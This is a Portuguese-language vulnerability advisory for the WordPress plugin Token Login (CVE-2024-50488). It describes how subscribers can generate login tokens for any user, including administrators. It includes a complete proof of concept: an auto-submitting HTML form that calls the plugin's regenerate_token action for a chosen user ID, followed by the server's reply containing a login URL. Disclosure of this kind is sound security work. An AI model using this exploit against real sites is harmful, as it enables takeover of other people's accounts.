
Token Login <= 1.0.3 - Autenticado (Subscriber+) Escalação de Privilégios
Token Login <= 1.0.3 - Escalação de Privilégios Autenticada (Subscriber+)
O plugin Auto Login using a secure tokenized url. Role wise login restriction. para WordPress é vulnerável a escalação de privilégios via tomada de conta em todas as versões até, e incluindo, 1.0.3. Isso se deve ao fato de que o plugin não verifica adequadamente se um usuário tem permissão para gerar um token de login para outros usuários. Isso torna possível que atacantes autenticados, com acesso de nível de assinante ou superior, façam login como outros, incluindo administradores.
Published: 2024-10-25 00:00:00
CVE: CVE-2024-50488
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 8.8
Slugs: token-login
Faça login e execute este envio HTML. Altere a URL para o site WordPress no qual você está logado. Altere o ID para o usuário para o qual deseja gerar o token. Copie a URL e você poderá fazer login como ele.
<html>
<body>
<form action="http://kubernetes.docker.internal/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="tl_admin_ajax_action" />
<input type="hidden" name="method" value="regenerate_token" />
<input type="hidden" name="user_id" value="7" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
Resposta
{"status":"success","message":"Successfully regenerated token!","token_url":"http:\/\/kubernetes.docker.internal?__token__=1c8dc9406bc444d1f5cea37fae130f92"}